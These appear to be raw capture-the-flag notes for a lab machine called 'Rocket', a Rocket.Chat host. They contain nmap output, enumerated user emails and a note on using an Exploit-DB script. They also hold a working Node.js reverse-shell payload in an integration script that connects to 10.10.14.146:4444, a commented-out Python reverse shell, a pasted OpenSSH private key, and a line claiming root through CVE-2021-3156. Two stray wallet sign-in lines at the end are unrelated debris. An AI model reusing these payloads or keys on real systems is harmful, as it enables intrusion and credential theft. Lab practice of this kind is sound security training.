# Rocket
nmap -A -vv -Pn 10.129.172.77
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-23 18:47 PDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:47
Completed NSE at 18:47, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:47
Completed NSE at 18:47, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:47
Completed NSE at 18:47, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 18:47
Completed Parallel DNS resolution of 1 host. at 18:47, 0.02s elapsed
Initiating Connect Scan at 18:47
Scanning 10.129.172.77 [1000 ports]
Discovered open port 80/tcp on 10.129.172.77
Discovered open port 22/tcp on 10.129.172.77
Increasing send delay for 10.129.172.77 from 0 to 5 due to max_successful_tryno increase to 4
Increasing send delay for 10.129.172.77 from 5 to 10 due to max_successful_tryno increase to 5
Increasing send delay for 10.129.172.77 from 10 to 20 due to 16 out of 52 dropped probes since last increase.
Discovered open port 3000/tcp on 10.129.172.77
Completed Connect Scan at 18:48, 37.76s elapsed (1000 total ports)
Initiating Service scan at 18:48
Scanning 3 services on 10.129.172.77
Completed Service scan at 18:48, 32.29s elapsed (3 services on 1 host)
NSE: Script scanning 10.129.172.77.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:48
Completed NSE at 18:48, 9.54s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:48
Completed NSE at 18:48, 0.93s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:48
Completed NSE at 18:48, 0.00s elapsed
Nmap scan report for 10.129.172.77
Host is up, received user-set (0.25s latency).
Scanned at 2021-07-23 18:47:26 PDT for 81s
Not shown: 997 closed ports
Reason: 997 conn-refused
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d9:10:6a:46:42:2b:1a:70:54:2b:c3:d8:d3:da:07:6f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDCygrXYNGVAmclf2y7z2/Qxm3vpojFDsnQW8/kPFoFx3IlzEg66Vq+nS5vEUy0JFMGgfopUcd5zUVUGwOM0WUMCap+A0nKd68W/vTIQ5Qjyui/YHmsAJ7TBgWNO4WKrJb7DHp4FXS6/0jv9YbXCvbRKM0Wtr78eKyTMWFAH2anO2dURVcsWy/emdfPx+rtAHd1J2dQKkzQ0qpyktpfCHPUAJHy4eYRmpyTNDklhE0j3gzaOc9vO/uSIYxWGfxT6HK67YuvzB/dVv3c0PUDOQeFNcGXbmN0NWv4S2SS/tZJq6VQoa7blNQgtLhmB/Fb8STZALxkJ2ohhsp+DDs5gv2fV5AthOeKZcOUlDdzLNcQAaLngLTelUTOZ1XFECjWrEbBCHbqUXatL+cNEAo6UUXN1OoXYCs95hw6+ZgEZMpwZ5MqvKwVmR0DWbCaH/CPMfrqScpzgr9Hde8gDNS2cvirGaiM5t6M/+Ar7I3v1Q//XSrP2p7taxRIEah6H2jIcUE=
| 256 3c:b5:2b:6a:26:18:83:c3:3c:d9:77:34:58:13:5b:18 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBG6v28IjKN3c3mRkJmvhlOnl+UIwV1T0lul7Qnat4zwkwCCrO9693fFf3R8msYjTxCT+5D5+zcIolfOvXzsPZAY=
| 256 91:34:8c:82:e0:8b:e3:d1:82:cb:6b:80:e0:99:e8:6a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHvYOqFs6OTsIn0MXAR5KPNM8Ui3a4Va9l0ewvdZVoPI
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 401666794A5E164A76E8BA21359B3477
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Rocket Hosting
3000/tcp open ppp? syn-ack
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| X-XSS-Protection: 1
| X-Content-Type-Options: nosniff
| X-Frame-Options: sameorigin
| X-Instance-ID: oMdkzHeT2TGk8szBK
| Content-Type: text/html; charset=utf-8
| Vary: Accept-Encoding
| Date: Sat, 24 Jul 2021 01:48:15 GMT
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <link rel="stylesheet" type="text/css" class="__meteor-css__" href="/789f2fee702e2a6a62ec245003ce4734eeec6f9a.css?meteor_css_resource=true">
| <meta charset="utf-8" />
| <meta http-equiv="content-type" content="text/html; charset=utf-8" />
| <meta http-equiv="expires" content="-1" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge" />
| <meta name="fragment" content="!" />
| <meta name="distribution" content="global" />
| <meta name="rating" content="general" />
| <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" />
| <meta name="mobile-web-app-capable" cont
| HTTPOptions:
| HTTP/1.1 200 OK
| X-XSS-Protection: 1
| X-Content-Type-Options: nosniff
| X-Frame-Options: sameorigin
| X-Instance-ID: oMdkzHeT2TGk8szBK
| Content-Type: text/html; charset=utf-8
| Vary: Accept-Encoding
| Date: Sat, 24 Jul 2021 01:48:17 GMT
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <link rel="stylesheet" type="text/css" class="__meteor-css__" href="/789f2fee702e2a6a62ec245003ce4734eeec6f9a.css?meteor_css_resource=true">
| <meta charset="utf-8" />
| <meta http-equiv="content-type" content="text/html; charset=utf-8" />
| <meta http-equiv="expires" content="-1" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge" />
| <meta name="fragment" content="!" />
| <meta name="distribution" content="global" />
| <meta name="rating" content="general" />
| <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" />
|_ <meta name="mobile-web-app-capable" cont
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.91%I=7%D=7/23%Time=60FB7160%P=aarch64-unknown-linux-gn
SF:u%r(GetRequest,1504,"HTTP/1\.1\x20200\x20OK\r\nX-XSS-Protection:\x201\r
SF:\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20sameorigin\
SF:r\nX-Instance-ID:\x20oMdkzHeT2TGk8szBK\r\nContent-Type:\x20text/html;\x
SF:20charset=utf-8\r\nVary:\x20Accept-Encoding\r\nDate:\x20Sat,\x2024\x20J
SF:ul\x202021\x2001:48:15\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\
SF:x20html>\n<html>\n<head>\n\x20\x20<link\x20rel=\"stylesheet\"\x20type=\
SF:"text/css\"\x20class=\"__meteor-css__\"\x20href=\"/789f2fee702e2a6a62ec
SF:245003ce4734eeec6f9a\.css\?meteor_css_resource=true\">\n<meta\x20charse
SF:t=\"utf-8\"\x20/>\n\t<meta\x20http-equiv=\"content-type\"\x20content=\"
SF:text/html;\x20charset=utf-8\"\x20/>\n\t<meta\x20http-equiv=\"expires\"\
SF:x20content=\"-1\"\x20/>\n\t<meta\x20http-equiv=\"X-UA-Compatible\"\x20c
SF:ontent=\"IE=edge\"\x20/>\n\t<meta\x20name=\"fragment\"\x20content=\"!\"
SF:\x20/>\n\t<meta\x20name=\"distribution\"\x20content=\"global\"\x20/>\n\
SF:t<meta\x20name=\"rating\"\x20content=\"general\"\x20/>\n\t<meta\x20name
SF:=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1,\x20m
SF:aximum-scale=1,\x20user-scalable=no\"\x20/>\n\t<meta\x20name=\"mobile-w
SF:eb-app-capable\"\x20cont")%r(HTTPOptions,1F86,"HTTP/1\.1\x20200\x20OK\r
SF:\nX-XSS-Protection:\x201\r\nX-Content-Type-Options:\x20nosniff\r\nX-Fra
SF:me-Options:\x20sameorigin\r\nX-Instance-ID:\x20oMdkzHeT2TGk8szBK\r\nCon
SF:tent-Type:\x20text/html;\x20charset=utf-8\r\nVary:\x20Accept-Encoding\r
SF:\nDate:\x20Sat,\x2024\x20Jul\x202021\x2001:48:17\x20GMT\r\nConnection:\
SF:x20close\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20<link\x20re
SF:l=\"stylesheet\"\x20type=\"text/css\"\x20class=\"__meteor-css__\"\x20hr
SF:ef=\"/789f2fee702e2a6a62ec245003ce4734eeec6f9a\.css\?meteor_css_resourc
SF:e=true\">\n<meta\x20charset=\"utf-8\"\x20/>\n\t<meta\x20http-equiv=\"co
SF:ntent-type\"\x20content=\"text/html;\x20charset=utf-8\"\x20/>\n\t<meta\
SF:x20http-equiv=\"expires\"\x20content=\"-1\"\x20/>\n\t<meta\x20http-equi
SF:v=\"X-UA-Compatible\"\x20content=\"IE=edge\"\x20/>\n\t<meta\x20name=\"f
SF:ragment\"\x20content=\"!\"\x20/>\n\t<meta\x20name=\"distribution\"\x20c
SF:ontent=\"global\"\x20/>\n\t<meta\x20name=\"rating\"\x20content=\"genera
SF:l\"\x20/>\n\t<meta\x20name=\"viewport\"\x20content=\"width=device-width
SF:,\x20initial-scale=1,\x20maximum-scale=1,\x20user-scalable=no\"\x20/>\n
SF:\t<meta\x20name=\"mobile-web-app-capable\"\x20cont");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:48
Completed NSE at 18:48, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:48
Completed NSE at 18:48, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:48
Completed NSE at 18:48, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.80 seconds
dirb http://
10.129.172.77/assets
10.129.172.77/index
update /etc/hosts
10.129.172.77 rocket.htb
http://rocket.htb/assets/js/
http://rocket.htb:3000/home
Possible users:
ezekial@rocket.htb
emmap@rocket.htb
elliot@rocket.htb
admin@rocket.htb
Grabbed 50108.py off exploit.db
Ran using emmap@ as the unauthed and elliot as the admin
Had issues with non Base32 tokens so modified the script to B32 encode before calling OAth
Here's the code for the web integration for Rocket:
Virtually nothing is installed on the box so I had to resort to Node
/* exported Script */
/* globals console, _, s */
/** Global Helpers
*
* console - A normal console instance
* _ - An underscore instance
* s - An underscore string instance
*/
class Script {
/**
* @params {object} request
*/
process_incoming_request({ request }) {
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
var net = require("net"), sh = require("child_process").exec("/bin/bash");
var client = new net.Socket();
client.connect(4444, "10.10.14.146", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});
//exec('python -c \'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("10.10.14.146"),int(os.getenv("4444"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")\'', (error, stdout, stderr) => {
// if (error) {
// console.log(`exec error: ${error}`);
// return;
// }
// console.log(`stdout: ${stdout}`);
// console.log(`stderr: ${stderr}`);
//});
}
}
The RSA Key for Ezekiel:
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
Root popped with CVE-2021-3156
Sign in with Wallet
Connect another wallet